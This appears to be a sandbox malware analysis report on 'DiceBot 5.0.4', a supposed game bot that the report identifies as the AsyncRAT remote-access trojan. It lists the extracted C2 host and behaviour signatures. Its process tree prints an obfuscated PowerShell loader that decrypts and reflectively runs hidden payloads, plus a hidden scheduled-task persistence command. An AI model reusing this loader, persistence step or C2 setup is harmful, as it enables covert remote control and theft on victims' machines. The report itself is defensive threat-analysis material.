Overview

overview

10

Static

static

3

DiceBot.5.0.4.zip

windows7-x64

7

DiceBot.5.0.4.zip

windows10-2004-x64

1

DiceBot 5.....4.exe

windows7-x64

1

DiceBot 5.....4.exe

windows10-2004-x64

10

DiceBot 5....ox.dll

windows7-x64

1

DiceBot 5....ox.dll

windows10-2004-x64

1

DiceBot 5....nt.dll

windows7-x64

1

DiceBot 5....nt.dll

windows10-2004-x64

1

DiceBot 5....on.dll

windows7-x64

1

DiceBot 5....on.dll

windows10-2004-x64

1

DiceBot 5....PI.dll

windows7-x64

1

DiceBot 5....PI.dll

windows10-2004-x64

1

DiceBot 5....SE.txt

windows7-x64

1

DiceBot 5....SE.txt

windows10-2004-x64

1

DiceBot 5....nt.dll

windows7-x64

1

DiceBot 5....nt.dll

windows10-2004-x64

1

DiceBot 5....in.dll

windows7-x64

1

DiceBot 5....in.dll

windows10-2004-x64

1

DiceBot 5....on.dll

windows7-x64

1

DiceBot 5....on.dll

windows10-2004-x64

1

DiceBot 5....pt.dll

windows7-x64

3

DiceBot 5....pt.dll

windows10-2004-x64

3

DiceBot 5....ua.dll

windows7-x64

1

DiceBot 5....ua.dll

windows10-2004-x64

1

DiceBot 5....ne.dll

windows7-x64

1

DiceBot 5....ne.dll

windows10-2004-x64

1

DiceBot 5....rs.dll

windows7-x64

1

DiceBot 5....rs.dll

windows10-2004-x64

1

DiceBot 5....te.dll

windows7-x64

1

DiceBot 5....te.dll

windows10-2004-x64

1

DiceBot 5....ll.xml

windows7-x64

3

DiceBot 5....ll.xml

windows10-2004-x64

1

Analysis

  • max time kernel
    144s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-01-2025 20:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DiceBot 5.0.4/DiceBot 5.0.4.exe

  • Size

    178KB

  • MD5

    109ffbefe8cccafc6db7276baa45be0f

  • SHA1

    df7300d951756013db8b820ce4b4044559fe83d1

  • SHA256

    647de53b1d9e75ec2ff48838924ddd00799d05c0d61af111a842a59621a90f7c

  • SHA512

    13af9f6925cb22bb2b4c644e6737d37e508c1a53677942619c415265e4a9b699769df7406d6409dad5198c428bf66c54cf33490a2b98450546b73a68422793d5

  • SSDEEP

    768:mj+HObZiwMBp7jlP9LWJz9AktYcF2l1x6KOFn60KS:m9bZi7B0QY21xlOFn60KS

Score
10/10
asyncratstakediscoveryexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

Stake

C2

powershellcmd.theworkpc.com:111

Mutex

AsyncMutex_bloxstrap

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\DiceBot 5.0.4.exe
    "C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\DiceBot 5.0.4.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\driver.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4380
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9a3dmqA7Z/DHdYvQvXDxJB6f7txQiyBVadbPgdWDko0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vXseLiQG8ejGzth94Cz/bQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DAOFT=New-Object System.IO.MemoryStream(,$param_var); $BxAQM=New-Object System.IO.MemoryStream; $tsDqC=New-Object System.IO.Compression.GZipStream($DAOFT, [IO.Compression.CompressionMode]::Decompress); $tsDqC.CopyTo($BxAQM); $tsDqC.Dispose(); $DAOFT.Dispose(); $BxAQM.Dispose(); $BxAQM.ToArray();}function execute_function($param_var,$param2_var){ $pDhYm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKlGi=$pDhYm.EntryPoint; $uKlGi.Invoke($null, $param2_var);}$jqCUp = 'C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\driver.bat';$host.UI.RawUI.WindowTitle = $jqCUp;$GNhJC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jqCUp).Split([Environment]::NewLine);foreach ($JyGcd in $GNhJC) { if ($JyGcd.StartsWith('KUxGjdLQAzrzMfSYqNGS')) { $mXPBz=$JyGcd.Substring(20); break; }}$payloads_var=[string[]]$mXPBz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
          PID:4944
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1580
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_763_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_763.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3772
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_763.vbs"
            4⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3580
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_763.bat" "
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2680
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9a3dmqA7Z/DHdYvQvXDxJB6f7txQiyBVadbPgdWDko0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vXseLiQG8ejGzth94Cz/bQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DAOFT=New-Object System.IO.MemoryStream(,$param_var); $BxAQM=New-Object System.IO.MemoryStream; $tsDqC=New-Object System.IO.Compression.GZipStream($DAOFT, [IO.Compression.CompressionMode]::Decompress); $tsDqC.CopyTo($BxAQM); $tsDqC.Dispose(); $DAOFT.Dispose(); $BxAQM.Dispose(); $BxAQM.ToArray();}function execute_function($param_var,$param2_var){ $pDhYm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKlGi=$pDhYm.EntryPoint; $uKlGi.Invoke($null, $param2_var);}$jqCUp = 'C:\Users\Admin\AppData\Roaming\Windows_Log_763.bat';$host.UI.RawUI.WindowTitle = $jqCUp;$GNhJC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jqCUp).Split([Environment]::NewLine);foreach ($JyGcd in $GNhJC) { if ($JyGcd.StartsWith('KUxGjdLQAzrzMfSYqNGS')) { $mXPBz=$JyGcd.Substring(20); break; }}$payloads_var=[string[]]$mXPBz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                6⤵
                • System Location Discovery: System Language Discovery
                PID:5112
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:3464
      • C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\render.exe
        "C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\render.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2648
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 888
          3⤵
          • Program crash
          PID:4664
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2648 -ip 2648
      1⤵
        PID:3788

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        9751fcb3d8dc82d33d50eebe53abe314

        SHA1

        7a680212700a5d9f3ca67c81e0e243834387c20c

        SHA256

        ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

        SHA512

        54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        20KB

        MD5

        27b9d9e1cf6548bf998d4e968b0bd5e7

        SHA1

        b371bb50257cbad5082216b94dfc188374bfa7b5

        SHA256

        9940d709058e28dcb3c1c00119a046d0634ed85ff4a65472df12b05493a06aaa

        SHA512

        86327acb1075eb9302b843cd1a0a4569827c6705d9c7d82b6bf3faa85b95883b2ac4eef00ac0391f0e47e34a0d5b971e8ceb5e49ef65f4d70559464584c1b108

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfoskpzj.nre.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Windows_Log_763.bat
        Filesize

        54KB

        MD5

        17f33919a97f2aef8e0c3319220c5c7e

        SHA1

        71d81cd98b31275cd626ff2b219b8ab5149e30ce

        SHA256

        afb0d669166beac060fe834d4d0c593b50b1700e913f81fa8df6533be14c9cbf

        SHA512

        8cc5ed6d9eea9f4f380edecba3265194d6cbf9ad7162c8166f5aea3dee964b5dbf0959f1b5d3bb87222d155428e850c01346af366c8eb07b57ec3975dcf62a5b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Windows_Log_763.vbs
        Filesize

        115B

        MD5

        ed96c285ef70baac6ee129024ef330fe

        SHA1

        cef6fefc190afa04804829ccd26a8b68a7c13a66

        SHA256

        55cdaa700babdb6c66c3e9bee7c0ad02c4a3ea4e98413bb24f08f7dc0bd63744

        SHA512

        39ef9404e193963459b01b41e2d8235b4c04d419a71766e5994128c7ee5a03bbaa9fda9f21874f39dc92f2a21082827f85126053d09ce3c112df75d9ee56fd9d

        Download Submit

      • memory/1580-42-0x0000000007380000-0x0000000007388000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1580-24-0x00000000057B0000-0x0000000005816000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1580-41-0x00000000071E0000-0x00000000071FA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/1580-17-0x00000000025A0000-0x00000000025D6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/1580-40-0x0000000007900000-0x0000000007F7A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/1580-23-0x0000000004EE0000-0x0000000004F02000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1580-39-0x0000000007200000-0x0000000007276000-memory.dmp

        Filesize

        472KB

        Download

      • memory/1580-38-0x0000000006400000-0x0000000006444000-memory.dmp

        Filesize

        272KB

        Download

      • memory/1580-19-0x0000000005110000-0x0000000005738000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/1580-43-0x00000000073A0000-0x00000000073B0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1580-25-0x0000000005890000-0x00000000058F6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1580-35-0x0000000005900000-0x0000000005C54000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/1580-36-0x0000000005EC0000-0x0000000005EDE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/1580-37-0x0000000005F10000-0x0000000005F5C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2596-12-0x00007FFAABF90000-0x00007FFAACA51000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2596-11-0x000002815F220000-0x000002815F242000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2596-0-0x00007FFAABF93000-0x00007FFAABF95000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2596-14-0x00007FFAABF90000-0x00007FFAACA51000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2596-1-0x000002815D480000-0x000002815D4AE000-memory.dmp

        Filesize

        184KB

        Download

      • memory/2648-18-0x0000000005AD0000-0x0000000006074000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2648-21-0x0000000006080000-0x0000000006226000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/2648-15-0x00000000747CE000-0x00000000747CF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2648-16-0x0000000000A70000-0x0000000000B72000-memory.dmp

        Filesize

        1.0MB

        Download

      • memory/2648-20-0x00000000055C0000-0x0000000005652000-memory.dmp

        Filesize

        584KB

        Download

      • memory/3464-90-0x0000000007810000-0x000000000781A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3464-89-0x00000000075B0000-0x00000000075C6000-memory.dmp

        Filesize

        88KB

        Download

      • memory/3772-66-0x0000000006FB0000-0x0000000007053000-memory.dmp

        Filesize

        652KB

        Download

      • memory/3772-69-0x00000000072E0000-0x00000000072F1000-memory.dmp

        Filesize

        68KB

        Download

      • memory/3772-68-0x0000000007370000-0x0000000007406000-memory.dmp

        Filesize

        600KB

        Download

      • memory/3772-67-0x0000000007140000-0x000000000714A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3772-54-0x0000000006390000-0x00000000063C2000-memory.dmp

        Filesize

        200KB

        Download

      • memory/3772-65-0x0000000006F80000-0x0000000006F9E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3772-55-0x000000006FD50000-0x000000006FD9C000-memory.dmp

        Filesize

        304KB

        Download